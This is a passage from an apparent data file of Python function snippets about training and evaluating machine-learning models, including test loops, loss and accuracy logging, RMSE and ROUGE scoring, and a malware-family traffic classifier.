np.expand_dims(p90_forecast, axis=-1), np.expand_dims(target, axis=-1)\n p = np.concatenate((p1, p2, p3), axis=-1)\n plot_temporal_serie(p, target)\n\n # Log stuff\n for k in self.test_losses.keys():\n mean_test_loss = np.mean(self.test_losses[k])\n print(f'\\t● AVG {k} Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n\n # log log log\n mean_test_loss = np.mean(self.test_loss)\n mean_smape = np.mean(self.test_smape)\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n print(f'\\t● AVG SMAPE on TEST-set: {mean_smape:.6f} │ T: {time() - t:.2f} s')", "def test(self, test_iter, step, corpus_type, id):\n\n self.model.eval()\n stats = Statistics()\n if not os.path.exists(self.args.result_path):\n os.makedirs(self.args.result_path)\n if not os.path.exists(self.args.story_path):\n os.makedirs(self.args.story_path)\n can_path = self.args.result_path + corpus_type + '.' + id + '_step%d.candidate' % step\n gold_path = self.args.result_path + corpus_type + '.' + id + '_step%d.gold' % step\n story_path = self.args.story_path + corpus_type + '.' 
+ id + '.story'\n with open(story_path, 'w') as save_story:\n with open(can_path, 'w') as save_pred:\n with open(gold_path, 'w') as save_gold:\n with torch.no_grad():\n for batch in test_iter:\n src = batch.src\n labels = batch.labels\n segs = batch.segs\n clss = batch.clss\n mask = batch.mask\n mask_cls = batch.mask_cls\n weight = batch.weight\n index = batch.index\n\n pred = []\n\n sents_vec, sent_scores, mask, cluster_weight = self.model(src, segs, clss, mask, mask_cls)\n loss = self.loss(sent_scores, labels.float())\n weight_loss = self.weight_loss(cluster_weight, weight)\n loss = (loss * mask.float()).sum()\n total_loss = loss + weight_loss * 10\n batch_stats = Statistics(float(total_loss.cpu().data.numpy()), len(labels))\n stats.update(batch_stats)\n\n sent_scores = sent_scores + mask.float()\n sent_scores = sent_scores.cpu().data.numpy()\n cluster_weight = cluster_weight.cpu().data.numpy()\n selected_ids = np.argsort(-sent_scores, 1)\n cluster_weight = np.argsort(cluster_weight)\n # print(selected_ids)\n # selected_ids = np.sort(selected_ids,1)\n cluster_num = len(cluster_weight)\n for i, idx in enumerate(selected_ids):\n rank = np.where(cluster_weight == i)[0][0]\n\n if rank <= max(cluster_num // 6, 6):\n for j in range(5):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num // 3, 10):\n for j in range(3):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num * 2 // 3, 15):\n for j in range(2):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n else:\n sen_ind = selected_ids[i][0]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n\n gold_summary = (batch.tgt_str[0].strip())\n pred.sort(key=lambda x: x[0])\n for i in range(len(pred)):\n save_story.write(pred[i][1].strip() + '\\n')\n if i == 0:\n save_pred.write(pred[i][1].strip())\n else:\n save_pred.write('<q> ' + pred[i][1].strip())\n save_gold.write(gold_summary)\n for sent in gold_summary.split('<q>'):\n save_story.write('@highlight {}\\n'.format(sent))\n if self.args.test_txt:\n return stats\n else:\n rouges = calculate_rouge(can_path, gold_path)\n logger.info('Rouges at step %d \\n%s' % (step, rouge_results_to_str(rouges)))\n self._report_step(0, step, valid_stats=stats)\n return stats, rouges", "def eval(self):\n self.train(mode=False)", "def learn(model: KW_Model,\n trainloader: DataLoader,\n testloader: DataLoader,\n optimizer: optim.Optimizer,\n nb_epoch: int,\n device: torch.device,\n eval_fn: Callable[[List[bool], List[Qid]], Dict[Qid, float]],\n mean_window: int = 50,\n entropy_lambda: float = 0.025,\n smt_lambda: float = 1.0,\n reinforce_lambda: float = 1.0,\n ) -> Tuple[nn.Module, Dict[str, List[torch.tensor]], Dict[str, List[torch.tensor]]]:\n print(\"Memory usage: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n past_rewards = {str(q_id.long().item()): deque(maxlen=mean_window)\n for _, _, q_ids, _ in chain(trainloader, testloader)\n for q_id in q_ids}\n \n logs = [\"reward\",\n \"scaled_entropy\",\n \"scaled_reinforce\",\n \"scaled_smt\",\n \"total_loss\",\n \"accuracy\"]\n train_logs = {log: list() for log in logs}\n test_logs = {log: list() for log in logs}\n del logs\n \n for epoch in range(nb_epoch):\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total 
= 0, 0\n print(f\"\\nEpoch {epoch}\")\n \n print(\"Begin epoch: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n model.train()\n for x, y, q_id, masks in trainloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n\n # entropy_lambda = min(1.01*entropy_lambda, 0.025)\n # reinforce_lambda = min(1.01*reinforce_lambda, 1.0)\n # smt_lambda = max(0.99*smt_lambda, 0.05)\n loss, reinforce_loss, entropy, smt_loss = losses\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().cpu().sum().tolist()\n nb_total += masks.cpu().sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {mean(running_loss): .3f} Rewa {mean(running_reward): .5f}\", end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n\n # Logs\n train_logs[\"reward\"].append(mean(running_reward))\n train_logs[\"scaled_entropy\"].append(mean(entropies))\n train_logs[\"scaled_reinforce\"].append(mean(reinforces))\n train_logs[\"scaled_smt\"].append(mean(smts))\n train_logs[\"total_loss\"].append(mean(running_loss))\n train_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n \n train_loss, train_reward = mean(running_loss), mean(running_reward)\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n model.eval()\n for x, y, q_id, masks in testloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n loss, reinforce_loss, entropy, smt_loss = losses\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().sum().tolist()\n nb_total += masks.sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {train_loss: .3f} Rewa {train_reward: .3f}\",\n f\"Te Loss{mean(running_loss): .3f} Rewa {mean(running_reward): .3f}\",\n end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n \n \n # Logs\n test_logs[\"reward\"].append(mean(running_reward))\n test_logs[\"scaled_entropy\"].append(mean(entropies))\n test_logs[\"scaled_reinforce\"].append(mean(reinforces))\n test_logs[\"scaled_smt\"].append(mean(smts))\n test_logs[\"total_loss\"].append(mean(running_loss))\n test_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n\n return model, train_logs, test_logs", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % 
(model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def final_eval(self):\n # Test performance - Load best model\n self.load_model(self.best_model_path, model_type='best')\n logging.info(\"Loading best model after epoch: %d\" %\n self.train_info['epoch'])\n\n perf_file = path.join(self.model_dir, \"perf.json\")\n if self.slurm_id:\n parent_dir = path.dirname(path.normpath(self.model_dir))\n perf_dir = path.join(parent_dir, \"perf\")\n if not path.exists(perf_dir):\n os.makedirs(perf_dir)\n perf_file = path.join(perf_dir, self.slurm_id + \".json\")\n\n output_dict = {'model_dir': self.model_dir}\n for key, val in vars(self.args).items():\n output_dict[key] = val\n\n for split in ['dev', 'test']:\n logging.info('\\n')\n logging.info('%s' % split.capitalize())\n result_dict = self.eval_model(split, final_eval=True)\n if split != 'test':\n logging.info('Calculated F1: %.3f' % result_dict['fscore'])\n\n output_dict[split] = result_dict\n\n json.dump(output_dict, open(perf_file, 'w'), indent=2)\n\n logging.info(\"Final performance summary at %s\" % perf_file)\n sys.stdout.flush()", "def modelfit(alg, data, features, target):\n\n # Split data into train and test.\n X_train, X_test, y_train, y_test = model_selection.train_test_split(data[features], data[target],\n test_size=.2)\n\n # Baseline fit.\n alg.fit(X_train, y_train)\n train_predictions = alg.predict(X_train)\n print(\"RMSE Train (Pre-CV): %.4g\" % np.sqrt(metrics.mean_squared_error(y_train, train_predictions)))\n\n\n # Cross_validation/hyper-parameter selection.\n #dtr_cv(alg, X_train, y_train)\n\n # Report results + visualize.\n test_predictions = alg.predict(X_test)\n print(\"RMSE Test: %.4g\" % np.sqrt(metrics.mean_squared_error(y_test, test_predictions)))\n\n plot_results(y_test, test_predictions)", "def test_per_dqn(self):\n model = PERDQNLightning(self.hparams)\n result = self.trainer.fit(model)\n\n self.assertEqual(result, 1)", "def test(self):\n self.model.eval()\n\n for step, sample in enumerate(self.test_loader):\n x, _, _ = sample\n x = x.to(self.device)\n\n y_pred = self.model.forward(x)\n loss = nn.MSELoss()(y_pred, x)\n self.test_losses.append(loss.item())\n\n if step % (max(8, len(self.test_loader)) // 8) == 0:\n out_img = torch.cat([x[0], torch.clamp(y_pred[0], 0, 1)], dim=2)\n self.sw.add_image(tag=f'sample_{step}', img_tensor=out_img, global_step=self.epoch)\n\n # log average loss on test set\n mean_test_loss = np.mean(self.test_losses)\n self.test_losses = []\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ patience: ', end='')\n self.sw.add_scalar(tag='test_loss', scalar_value=mean_test_loss, global_step=self.epoch)\n\n # save best model and update training patience\n if self.best_test_loss is None or mean_test_loss < self.best_test_loss:\n self.best_test_loss = mean_test_loss\n self.patience = conf.FX_PATIENCE\n torch.save(self.model.state_dict(), self.log_path / 'best.pth')\n else:\n self.patience = self.patience - 1\n print(f'{self.patience}/{conf.FX_PATIENCE}')\n\n if self.patience == 0:\n self.show_completion_msg()", "def computeRmse(model, data, n , sc):\n truth = data.map( lambda x: ((x[0], x[1]), x[2]) )\n truth.cache()\n ##print 'test zhou 0.....', truth.count() , '............', truth.take(10)\n\n predictions = model.predictAll(data.map(lambda x: (x[0], x[1])))\n predictions.cache()\n # here let's rescale predicted ratings to 0-10 scale\n maxPrediction = predictions.map(lambda x: x[2]).max()\n minPrediction = predictions.map(lambda x: 
x[2]).min()\n maxRate = RatingScale\n minRate = RatingScaleMin\n ##print 'test zhou 1......', predictions.count(), '............', predictions.take(10)\n\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate )).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n\n\n #predictedRating = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate ) )\n predictedRating = predictions.map(lambda x: ((x[0], x[1]), x[2] ) )\n predictedRating.cache()\n ##predictedRating.checkpoint()\n ##print 'test zhou 2.......', predictedRating.count(), '............', predictedRating.take(10)\n\n\n \n\n\n predictionsAndRatings = predictedRating.join(truth).values()\n #predictionsAndRatings = sc.union(predictedRating, truth)\n predictionsAndRatings.cache()\n #print 'test zhou 3........', predictionsAndRatings.count(), '............', predictionsAndRatings.take(10)\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), x[2])).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n \n return sqrt(predictionsAndRatings.map(lambda x: (x[0] - x[1]) ** 2).reduce(add) / float(n))\n #return 1.0", "def model_evaluation(X_train, y_train, X_test, y_test, k=16):\n print(\">>>>>>> x.shape\", X_train.shape)\n p_matrix, X_reduce = dimension_reduction(X_train, k=k)\n print(\"model training ...\")\n bdt = AdaBoostClassifier(DecisionTreeClassifier(max_depth=2), n_estimators=30, learning_rate=1)\n bdt.fit(X_reduce, y_train)\n print(\"fit succeed\")\n\n X_test = np.dot(X_test, p_matrix)\n y_pred = bdt.predict(X_test)\n print(classification_report(y_test, y_pred, target_names=['benign', 'gafgyt', 'miari'], digits=4))", "def compute_test():\n model.eval()\n sets = list(features.keys())\n for dset, loaders in zip(sets, [train_loaders, val_loaders, test_loaders]):\n final_specific_loss = 0\n final_total_loss = 0\n for loader in loaders:\n loader_total_loss = 0\n loader_specific_loss = 0\n for data in loader:\n output = model(data.to(device))\n specific_loss = specific_loss_torch_geom(output, (data.pos, data.y),\n data.batch, batch_sizes[dset]).detach()\n loader_specific_loss += specific_loss\n loader_total_loss += torch.mean(specific_loss)\n # Average the loss over each loader\n loader_specific_loss /= len(loader)\n loader_total_loss /= len(loader)\n # Average the loss over the different loaders\n final_specific_loss += loader_specific_loss / len(loaders)\n final_total_loss += loader_total_loss / len(loaders)\n del output, loader_specific_loss\n\n print(\"Test set results \", dset, \": loss= {:.4f}\".format(final_total_loss))\n print(dset, \": \", final_specific_loss)\n print(\"Results in log scale\", np.log10(final_specific_loss.detach().cpu()),\n np.log10(final_total_loss.detach().cpu().numpy()))\n if args.wandb:\n wandb.run.summary[\"test results\"] = np.log10(final_specific_loss.detach().cpu())\n # free unnecessary data\n\n\n final_specific_numpy = np.log10(final_specific_loss.detach().cpu())\n del final_total_loss, final_specific_loss\n torch.cuda.empty_cache()\n return final_specific_numpy", "def train(self,path,mode):\n if mode == \"porto\":\n self.prepare_data(path)\n else:\n self.prepare_sumo_data(path)\n self.poly_regression()", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def test_machine_learning():", "def test_model_performance(model_es,test_file):\n test_label = 
get_test_label(test_file)\n result = model_es.predict(input_fn = lambda :input_fn(test_file,1,False,100,True))\n predict_list = []\n for one_res in result:\n if \"probabilities\" in one_res:\n predict_list.append(one_res['probabilities'][1])\n get_auc(predict_list,test_label)", "def eval_regression_performance(dset, model, scaler, measure):\n X = dset[\"X\"]\n y = dset[\"y\"]\n y = y.reshape((len(y), 1))\n yhat = model.predict(X)\n\n # afecta en algo aplicar invers_stransform sobre una sola columna que con tra la matriz?\n prediction = scaler.inverse_transform(yhat)\n\n # invert scaling for actual\n true = scaler.inverse_transform(y)\n\n # calculate MAE\n performance = measure(true, prediction)\n return performance", "def test(self):\n for data_tier in self.data_tiers:\n tot = len(self.preprocessed_data[data_tier]['features'])\n p = int(math.floor(tot*0.2))\n test_features = np.array(self.preprocessed_data[data_tier]['features'][p:])\n trend_test_classifications = np.array(self.preprocessed_data[data_tier]['trend_classifications'][p:])\n avg_test_classifications = np.array(self.preprocessed_data[data_tier]['avg_classifications'][p:])\n accuracy_trend = self.clf_trend[data_tier].score(test_features, trend_test_classifications)\n accuracy_avg = self.clf_avg[data_tier].score(test_features, avg_test_classifications)\n self.logger.info('The accuracy of %s trend classifier for data tier %s is %.3f', self.name, data_tier, accuracy_trend)\n self.logger.info('The accuracy of %s avg regressor for data tier %s is %.3f', self.name, data_tier, accuracy_avg)", "def get_perf(self) :\n self.train()\n self.df_true = self.df_true[self.length:]\n self.accuracy , self.recall, self.specificity, self.profit, self.min , self.max = get_accuracy_LSTM(self.df_test, self.df_true,self.model, self.length)", "def main():\n housing = pd.read_csv(\"Data/train_original.csv\")\n housing[\"TotalSF\"] = (\n housing[\"TotalBsmtSF\"] + housing[\"1stFlrSF\"] + housing[\"2ndFlrSF\"]\n )\n training_features, testing_features, training_target, testing_target = impute_dummify_and_split(\n housing, drop_target=False\n )\n\n p_values = [\n (c, pearsonr(training_features[\"SalePrice\"], training_features[c])[1])\n for c in training_features.columns\n ]\n\n p_value_limits = [0.05]\n\n result = []\n ps_and_cols = {}\n\n for p_value_limit in p_value_limits:\n\n high_ps = list(\n map(lambda t: t[0], sorted(p_values, key=lambda t1: t1[1])[:15])\n )\n\n print(training_features[high_ps].corr())\n\n columns = [p[0] for p in p_values if p[1] < p_value_limit]\n\n training_features_restricted = training_features[columns].drop(\n \"SalePrice\", axis=\"columns\"\n )\n\n testing_features_restricted = testing_features[columns].drop(\n \"SalePrice\", axis=\"columns\"\n )\n\n for model in (\n linear_model.Lasso(alpha=2.1),\n linear_model.Ridge(alpha=2.1),\n ):\n\n model.fit(training_features_restricted, training_target)\n\n train_score = model.score(\n training_features_restricted, training_target\n )\n\n test_score = model.score(\n testing_features_restricted, testing_target\n )\n\n name = str(model).split(\"(\")[0]\n\n result = result + [\n (\n \"_2_restrict_features\",\n name,\n \"p value limit: {:.3f}, alpha: 2.1\".format(p_value_limit),\n train_score,\n test_score,\n )\n ]\n\n print(ps_and_cols)\n return training_features[high_ps].corr()", "def assess_perf(self, bases: list, set_type, epoch):\n self.prepare_calc_performance()\n self.base_dfl = dict() # base dict of lists with prediction data frames\n for base in bases:\n self.base_dfl[base] = 
list()\n ohlcv_list = ad.SplitSets.split_sets(set_type, self.predictor.ohlcv.load_data(base))\n features_list = ad.SplitSets.split_sets(set_type, self.predictor.features.load_data(base))\n targets_list = ad.SplitSets.split_sets(set_type, self.predictor.targets.load_data(base))\n assert len(ohlcv_list) == len(features_list)\n assert len(ohlcv_list) == len(targets_list)\n for ix in range(len(ohlcv_list)):\n odf = ohlcv_list[ix]\n fdf = features_list[ix]\n tdf = targets_list[ix]\n if (fdf is None) or fdf.empty or (tdf is None) or tdf.empty:\n logger.warning(f\"empty data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n [fdf, tdf] = ccd.common_timerange([fdf, tdf])\n\n if self.predictor.scaler is not None:\n fdf_scaled = self.predictor.scaler.transform(fdf.values)\n pred = self.predictor.kerasmodel.predict_on_batch(fdf_scaled)\n else:\n logger.error(\"missing scaler\")\n pred = self.predictor.kerasmodel.predict_on_batch(fdf.values)\n if pred is None:\n logger.warning(f\"no prediction data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n pdf = pd.DataFrame(data=pred, index=fdf.index, columns=self.predictor.targets.target_dict().keys())\n pdf.loc[pdf.index[-1], ct.SELL] = 1 # force sell at end of data range\n if pdf.empty:\n logger.warning(f\"empty prediction data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n pdf = pd.concat([odf.close, tdf.target, pdf], axis=1, join=\"inner\")\n self.base_dfl[base].append(self.calc_performance(pdf))\n logger.info(f\"\\n performance results \\n{self.total}\\n\")\n logger.info(f\"\\n precision results \\n{self.confusion}\\n\")\n return self.find_best()", "def test_model(self, batch_size):\n (_, gen_val, gen_test) = self.dataset.data_loaders(\n batch_size=batch_size,\n split=(0.01, 0.01)\n )\n print('Num Test Batches: ', len(gen_test))\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )", "def test_10_test_model(self, example):\n res = example.calc_model()\n print(example.trips_ij)\n total_trips_target = example.persons_gi.sum()\n total_trips_actual = example.trips_ij.sum()\n np.testing.assert_almost_equal(total_trips_target, total_trips_actual)", "def main_stats_model(y_train: pd.DataFrame, y_test: pd.DataFrame, y_pred: np.ndarray,\n model_name: str = '',\n model_parameters: dict = None,\n model_preprocessing: str = '',\n sequence_origin: str = '',\n primers_origin: str = '',\n taxonomy_level: Union[List[int], int] = '',\n selected_primer: Union[List[str], str] = '',\n test_size: float = 0.2,\n feature_importances: np.ndarray = None,\n k: int = 4,\n save_csv: bool = False,\n xgb_model=None,\n rf_model=None,\n save_model=False,\n save_tree: int = 0):\n model_path = folder_paths['model_results'] + model_name + '{}'.format(slash)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n folder_number = get_new_model_folder_number(model_name=model_name)\n analysis_path = model_path + '{:0>5d}_analysis_{}_{}{}'.format(folder_number, selected_primer, taxonomy_level, slash)\n os.makedirs(analysis_path)\n\n log_path = analysis_path + 'model_results.txt'\n logger = StatLogger(log_path=log_path)\n\n # Basic information on configuration\n test_size = get_model_info(y_test, model_name, model_parameters, model_preprocessing, sequence_origin,\n primers_origin, taxonomy_level, selected_primer, test_size, logger)\n\n # Metrics of model results\n 
main_class_prop, accuracy = get_metrics_model(y_train, y_test, y_pred, logger, feature_importances, k, save_tree,\n xgb_model,\n analysis_path=analysis_path)\n\n if save_csv:\n add_optimal_model_params(folder_number, selected_primer, taxonomy_level, accuracy, model_parameters,\n model_path=model_path)\n\n if save_model:\n if xgb_model is not None:\n xgb_model.save_model(analysis_path+'0001.model')\n if rf_model is not None:\n filename = analysis_path+'0001.model'\n pickle.dump(rf_model, open(filename, 'wb'))\n\n logger.close_file()\n\n return test_size, main_class_prop, accuracy", "def test_model(net, data_loader):\n net.eval()\n running_loss = 0.0\n with torch.no_grad():\n for data in data_loader:\n X = data['X']\n y_d = data['y_descreen']\n outputs = net(X)\n loss = criterion(outputs, y_d)\n running_loss += loss\n return running_loss", "def master_modelisation(X,y,test_size,model_function_list) :\n models = model_function_list\n\n output = pd.DataFrame()\n model = []\n RMSE = []\n MAPE = []\n tenth_perc = []\n ninetieth_perc = []\n\n for i in models:\n output_row = pd.DataFrame()\n\n model.append(i)\n\n y_pred, y_test = i(df, variables, test_size)\n\n RMSE.append(compute_rmse(y_test, y_pred))\n MAPE.append(compute_mape(y_test, y_pred))\n tenth_perc.append(tenth_percentile(y_test, y_pred))\n ninetieth_perc.append(ninetieth_percentile(y_test, y_pred))\n\n output['Model'] = model\n output['RMSE'] = RMSE\n output['MAPE'] = MAPE\n output['tenth_perc'] = tenth_perc\n output['ninetieth_perc'] = ninetieth_perc\n\n return output", "def test_model():\n pass", "def test_model(model: nn.Module, test_set: data.DataLoader, number_of_classes: int) -> Tuple[score.FloatScore, score.DictScore]:\n # model.eval is used for ImageNet models, batchnorm or dropout layers will work in eval mode.\n model.eval()\n\n def test_average() -> score.FloatScore:\n correct = 0\n total = 0\n\n with torch.set_grad_enabled(False):\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (average)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred.data, 1)\n\n total += yreal.size(0)\n correct += (predicted == yreal).sum().item()\n\n accuracy = 100 * correct / total\n log.info(\"Accuracy of the network on the {} test images (average): {}\".format(total, accuracy))\n with open('epoch_logs.txt', 'a+') as file:\n file.write('Test Acc: {}\\n'.format(accuracy))\n return score.FloatScore(accuracy)\n\n def test_per_class() -> score.DictScore:\n class_correct = list(0. for _ in range(number_of_classes))\n class_total = list(0. 
for _ in range(number_of_classes))\n total = 0\n\n with torch.no_grad():\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (per class)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n total += yreal.size(0)\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred, 1)\n c = (predicted == yreal).squeeze()\n for i in range(yreal.shape[0]):\n label = yreal[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n log.info(\"Accuracy of the network on the {} test images (per-class):\".format(total))\n\n per_class_accuracy = {}\n for i in range(number_of_classes):\n accuracy = 100 * class_correct[i] / (class_total[i] + 0.0001)\n per_class_accuracy[i] = accuracy\n print('Accuracy of %5s : %2d %%' % (\n i, accuracy))\n\n return score.DictScore(per_class_accuracy)\n\n return test_average(), test_per_class()", "def train():\n pass", "def evaluate(self, train_set, test_set, shuffle_batch=True,\n epochs=25, lr_decay=0.95, sqr_norm_lim=9,labels=None,model=None): \n cost = self.negative_log_likelihood(self.y) \n dropout_cost = self.dropout_negative_log_likelihood(self.y)\n # adadelta upgrades: dict of variable:delta\n grad_updates = self.sgd_updates_adadelta(dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n # shuffle dataset and assign to mini batches.\n # if dataset size is not a multiple of batch size, replicate \n # extra data (at random)\n np.random.seed(3435)\n batch_size = self.batch_size\n if train_set.shape[0] % batch_size > 0:\n extra_data_num = batch_size - train_set.shape[0] % batch_size\n #extra_data = train_set[np.random.choice(train_set.shape[0], extra_data_num)]\n perm_set = np.random.permutation(train_set) \n extra_data = perm_set[:extra_data_num]\n new_data = np.append(train_set, extra_data, axis=0)\n else:\n new_data = train_set\n \n shuffled_data = np.random.permutation(new_data) # Attardi\n n_batches = shuffled_data.shape[0]/batch_size\n # divide train set into 90% train, 10% validation sets\n n_train_batches = int(np.round(n_batches*0.8))\n n_val_batches = n_batches - n_train_batches\n train_set = shuffled_data[:n_train_batches*batch_size,:]\n val_set = shuffled_data[n_train_batches*batch_size:,:] \n # push data to gpu \n # the dataset has the format [word_indices,padding,user,label]\n train_set_x, train_set_y = shared_dataset(train_set[:,:-2], train_set[:,-1]) \n train_set_u = theano.shared(np.asarray(train_set[:,-2],dtype='int32')) \n # val_set_x = val_set[:,:-2]\n # val_set_u = val_set[:,-2]\n # val_set_y = val_set[:,-1]\n val_set_x, val_set_y = shared_dataset(val_set[:,:-2], val_set[:,-1])\n val_set_u = theano.shared(np.asarray(val_set[:,-2],dtype='int32')) \n test_set_x = test_set[:,:-2]\n test_set_u = test_set[:,-2]\n test_set_y = test_set[:,-1] \n batch_start = self.index * batch_size\n batch_end = batch_start + batch_size\n\n # compile Theano functions to get train/val/test errors\n \n \n test_y_pred = self.predict(test_set_x,test_set_u)\n test_error = T.mean(T.neq(test_y_pred, self.y))\n # errors on train set\n if self.Users is not None:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]\n },\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]},\n 
allow_input_downcast=True)\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end], \n self.u: val_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.u, self.y], test_error, allow_input_downcast=True)\n else:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.y], test_error, allow_input_downcast=True)\n\n # start training over mini-batches\n print 'training...' \n best_val_perf = 0\n test_perf = 0 \n patience = 5\n drops = 0\n prev_val_perf = 0 \n for epoch in xrange(epochs):\n start_time = time.time()\n # FIXME: should permute whole set rather than minibatch indexes\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n self.set_zero(self.zero_vec) # CHECKME: Why?\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n self.set_zero(self.zero_vec)\n train_losses = [train_error(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1 - np.mean(val_losses) \n info = 'epoch: %i\\%i (%.2f secs) train acc: %.2f %% | val acc: %.2f %%' % (\n epoch,epochs, time.time()-start_time, train_perf * 100., val_perf*100.) 
\n # from ipdb import set_trace; set_trace()\n if val_perf > prev_val_perf: \n drops=0\n if val_perf >= best_val_perf:\n best_val_perf = val_perf\n info+= \" **\"\n if model:\n # print \"save model\"\n self.save(model)\n if self.Users is not None:\n test_loss = test_model(test_set_x, test_set_u, test_set_y)\n else:\n test_loss = test_model(test_set_x, test_set_y)\n test_perf = 1 - test_loss \n else: \n drops+=1\n if drops >= patience:\n print \"Ran out of patience...\"\n break\n prev_val_perf = val_perf\n print info\n # set_trace() \n return test_perf", "def fit_model(X_train, X_test, y_train, y_test, model):\n \n if model == 'LinearRegression':\n \n regressor=LinearRegression()\n regressor.fit(X_train,y_train)\n y_pred =regressor.predict(X_test)\n r2 = r2_score(y_test, y_pred)\n \n elif model == 'Lasso':\n \n lasso = Lasso()\n lasso.fit(X_train, y_train)\n lasso_pred = lasso.predict(X_test)\n r2 = r2_score(y_test, lasso_pred)\n\n elif model == 'Ridge':\n \n ridge = Ridge()\n ridge.fit(X_train, y_train)\n ridge_pred = ridge.predict(X_test)\n r2 = r2_score(y_test, 